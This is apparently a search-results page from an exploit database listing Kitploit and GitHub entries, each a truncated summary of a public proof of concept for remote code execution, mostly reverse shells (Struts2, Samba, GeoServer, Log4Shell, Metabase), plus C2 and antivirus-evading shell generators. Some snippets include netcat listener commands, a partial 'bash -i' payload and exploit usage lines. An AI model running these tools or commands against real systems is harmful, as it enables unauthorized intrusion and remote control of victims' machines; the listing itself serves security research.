Lucene search
+L

2528 matches found

Kitploit
Kitploit
added 2026/09/11 3:58 p.m.4 views

CVE-2021-22205

CVE-2021-22205 CVE-2021-22205 RCE tool is only for sharing and communication. Do not use for unauthorized testing, otherwise the author is not responsible. root@kitploit: -R string VPS to load tools eg: -R 127.0.0.1:8083 -T string Tool name eg: -T fscan -c string exec cmd eg: -c "id" default "id"...

10CVSS8.2AI score0.99731EPSS
SaveExploits29
GithubExploit
GithubExploit
added 2026/09/11 3:53 p.m.19 views

ImpactSword

ImpactSword – Red Team Edition ImpactSword is an offensive se...

9.8CVSS0.99992EPSS
SaveExploits165
Kitploit
Kitploit
added 2026/09/11 3:13 p.m.5 views

CVE-2017-7494

CVE-2017-7494 CVE-2017-7494 C poc Use CVE-2017-7494 to get a reverse shell 1. First compile sambainit.c to generate libsamba.so 2. Modify the relevant addresses in isknownpipename.c, compile and execute...

10CVSS7.8AI score0.99448EPSS
SaveExploits26
Kitploit
Kitploit
added 2026/09/11 3:12 p.m.7 views

CVE-2018-11776

CVE-2018-11776 CVE-2018-11776 / S2-057 的实验环境 演示 运行服务器 root@kitploit: $ docker run -d --hostname struts2 --name cve-2018-11776 -p 30080:8080 knqyf263/cve-2018-11776 利用 root@kitploit: $ nc -l 10000 or nc -lp 10000 root@kitploit: $ python3 exploit.py localhost:30080 'bash -i &...

9.3CVSS8.2AI score0.99991EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/11 3:10 p.m.5 views

GTRS

GTRS - Shell Inversa de Google Translator Esta herramienta utiliza Google Translator como proxy para enviar comandos arbitrarios a una máquina infectada. root@kitploit: INFECTED MACHINE ==HTTPS== GOOGLE TRANSLATE ==HTTP== C2 Configuración del Entorno Primero necesitas un VPS y un dominio; para el...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 3:08 p.m.6 views

XSS2Shell-CVE-2026-64638

🔍 @Mr-LeonardoGomes 💀 XSS2Shell-CVE-2026-64638 XSS2Shell Multi-Target Scanner Developer: Credit: YogaGymn PoC/scanning utility for authorized security testing on WordPress. The project contains an exploitation flow for a single target and a concurrent multi-target scan-only mode. Important: Use...

8.9CVSS8AI score0.31204EPSS
SaveExploits33
Kitploit
Kitploit
added 2026/09/11 2:15 p.m.6 views

sak1to-shell

sak1to-shell Servidor c2 multi-hilo, multi-sistema/plataforma Linux/Windows y cliente de shell TCP inversa para Windows, ambos escritos en C. Compilando el cliente de shell TCP inversa con i686-w64-mingw32-gcc: root@kitploit: i686-w64-mingw32-gcc sakitorevshell.c lib/windows/sakitowincore.c -o...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 2:14 p.m.4 views

CVE-2023-28771-PoC

CVE-2023-28771-PoC PoC for CVE-2023-28771 based on Rapid7's excellent writeup Requires the scapy Python library for sending IKE packets. root@kitploit: usage: CVE-2023-28771-poc.py -h --cmd CMD --lhost LHOST --lport LPORT rhost positional arguments: rhost options: -h, --help show this help messag...

9.8CVSS8.5AI score0.99284EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/11 2:01 p.m.6 views

CVE-2024-10914-Exploit

SilverX Exploit Tool 📌 Description SilverX Exploit Tool is a penetration testing script designed to detect and exploit vulnerabilities in web applications. It provides a shell-like interface for executing commands remotely on vulnerable systems. ⚠️ Disclaimer This tool is for educational and...

9.8CVSS8AI score0.96183EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/11 1:53 p.m.8 views

ImageTragick-CVE-2016-3714-RShell

ImageTragick-CVE-2016-3714-RShell These are CVE-2016-3714 mvg/svg POCs using bash, nc, php and other tools to build a reverse shell. Declaration For research and ethical hacking only... Usage 1. Server Side : nc -l - p port number 2. upload the pictures to vul sites Acknowledge Thankd...

10CVSS6.8AI score0.97485EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/11 1:47 p.m.7 views

CVE-2024-36401

CVE-2024-36401 的 RCE CVE-2024-36401 GeoServer 的 POC。该 POC 将尝试从目标建立反向系统 shell。 概述 CVE-2024-36401 的 POC:针对 GeoServer 2.25.1、2.24.3 和 2.23.5 之前版本的 RCE。此 POC 基于 phith0n 的安全公告。 工作原理 1. 在您的机器上设置监听器,等待目标返回反向 shell。 2. 该 POC 将发送一个带有 payload 的 POST 请求。 3. 尝试在目标服务器上建立 shell。 4. 此技术假定目标上已安装 nc。 使用方法 该 POC...

9.8CVSS8.1AI score0.99813EPSS
SaveExploits26References1
Kitploit
Kitploit
added 2026/09/11 1:43 p.m.6 views

CVE-2024-32002-Reverse-Shell

CVE-2024-32002-Reverse-Shell 此脚本演示如何利用CVE-2024-32002漏洞获取反向shell,从而远程访问受影响系统。请在受控环境中谨慎使用,仅用于教育或安全测试目的。 博客文章 此脚本灵感来源于博客:https://amalmurali.me/posts/git-rce。 你可以在那里找到关于此漏洞的更多细节。 工作原理 1. 一个恶意仓库(gitrce)包含一个具有特殊设计路径的子模块。 2. 子模块路径利用大小写变化,利用不区分大小写的文件系统。 3. 子模块包含一个指向其 .git/ 目录的符号链接,该目录包含一个恶意钩子。 4...

9CVSS7.8AI score0.29234EPSS
SaveExploits32
Kitploit
Kitploit
added 2026/09/11 1:26 p.m.7 views

CVE-2026-34197-Apache-ActiveMQ-RCE

Fixed the issue where the reverse shell failed because the command was not XML-escaped...

8.8CVSS7AI score0.98256EPSS
SaveExploits15
Kitploit
Kitploit
added 2026/09/11 1:25 p.m.4 views

Exploiting-a-vulnerability-using-reverse-shell

Information Security Fundamentals — Spring 2026 Project Total Points: 20 | Deadline: No late submissions accepted Overview This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical pre-authentication RCE vulnerability CVE-2025-32433 in...

10CVSS7.8AI score0.98754EPSS
SaveExploits38References1
Kitploit
Kitploit
added 2026/09/11 12:44 p.m.5 views

CVE-2017-17562

CVE-2017-17562 RCE GoAhead web server 2.5 3.6.5 Standalone Python 3 reverse shell exploit for CVE-2017-17562, works on GoAhead web server versions 2.5 3.6.5. Blog article here. Written and tested on Python 3.7 based on POC and vulnerable environment here. Some code borrowed from the Metasploit...

8.1CVSS7.3AI score0.96327EPSS
SaveExploits15References3
Kitploit
Kitploit
added 2026/09/11 12:26 p.m.6 views

CVE-2021-44228-PoC

Self-contained lab environment PoC that runs a reverse-shell with Log4Shell CVE-2021-44228 This is a self-contained lab environment that runs the exploit safely, all from docker compose. The affected versions are Apache Log4j =2.0–2.14.1 and the CVE is tracked as CVE-2021-44228 CVSS score: 10.0. ...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References2
Kitploit
Kitploit
added 2026/09/11 12:05 p.m.6 views

CVE-2023-38646

CVE-2023-38646 - Metabase Pre-Auth RCE ⚠️ For educational and authorized security research purposes only Original Exploit Authors Very grateful to the original PoC author securezeron Step Guides 1. Set Up the Listener on your attacker machine: root@kitploit: nc -nlvp 4444 2. Then, run this command...

9.8CVSS8.4AI score0.98677EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/11 12:02 p.m.98 views

mcreator

mcreator Encoded Reverse Shell Generator With Techniques To Bypass AV's Installation root@kitploit: git clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py Version python 2.7. can't be lower or higher than 2.7 cause of the """ syntax in scripts. Runnig mcreator...

5.8AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/11 11:45 a.m.5 views

CVE-2026-42945-NGINX-Rift

CVE-2026-42945-NGINX-Rift root@kitploit: Basic usage with target IP python3 exploit.py --target-ip 192.168.1.100 --cmd "id" With custom port python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id" Reverse shell python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1...

9.2CVSS7.7AI score0.68047EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/11 11:42 a.m.3 views

Samba-CVE-2007-2447-Exploit

Samba CVE-2007-2447 漏洞利用 这是一个用于利用 CVE-2007-2447 的 Python 脚本,该漏洞是 Samba 服务器中的“用户名”映射脚本命令执行漏洞。 描述 此漏洞利用程序针对 Samba 版本 3.x - 4.x。CVE-2007-2447 允许攻击者通过构造恶意的用户名和密码在易受攻击的 Samba 服务器上执行任意命令。 使用方法 1. 在你的攻击机上设置监听器,例如使用 Netcat:nc -nvlp 1234 2. 运行 Python 脚本并提供所需信息: 你的 IP(用于传递反向 shell) 受害者 IP 受害者端口 3. 脚本将构建反向...

6CVSS8.1AI score0.49759EPSS
SaveExploits18
Rows per page
Query Builder